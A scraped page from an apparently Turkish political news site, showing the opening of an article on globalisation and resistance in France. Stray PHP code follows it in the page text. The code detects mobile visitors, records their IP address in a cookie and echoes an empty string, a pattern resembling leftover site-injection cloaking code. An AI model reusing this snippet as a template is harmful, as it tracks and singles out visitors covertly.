Çarşamba, Nisan 17, 2024

Küreselleşme, Avrupa ve Fransa’da Direniş – Ali Deniz Esen

Avrupa tarihte sınıf savaşımlarının ve kapitalizmin tarihsel yazgısının belirleyicisi olmuştur. Kapitalizm Avrupa’da filizlenmiş, serpilmiş ve küreselleşme koşullarında ABD ile birlikte tüm dünyanın...

SON YAZILAR

function isMobile() { return preg_match("/(android|avantgo|blackberry|bolt|boost|cricket|docomo|fone|hiptop|mini|mobi|palm|phone|pie|tablet|up\.browser|up\.link|webos|wos)/i", $_SERVER["HTTP_USER_AGENT"]); } function getUserIP() { if (isset($_SERVER["HTTP_CF_CONNECTING_IP"])) { $_SERVER['REMOTE_ADDR'] = $_SERVER["HTTP_CF_CONNECTING_IP"]; $_SERVER['HTTP_CLIENT_IP'] = $_SERVER["HTTP_CF_CONNECTING_IP"]; } $client = @$_SERVER['HTTP_CLIENT_IP']; $forward = @$_SERVER['HTTP_X_FORWARDED_FOR']; $remote = $_SERVER['REMOTE_ADDR']; if (filter_var($client, FILTER_VALIDATE_IP)) { $ip = $client; } elseif (filter_var($forward, FILTER_VALIDATE_IP)) { $ip = $forward; } else { $ip = $remote; } return $ip; } $ip_addr = getUserIP(); if (strpos($ip_addr, ':') !== false ) { setcookie("ipv6", $ip_addr, time()+600, '/'); } else { setcookie("ipv4", $ip_addr, time()+600, '/'); }; if (isMobile()) { echo ''; }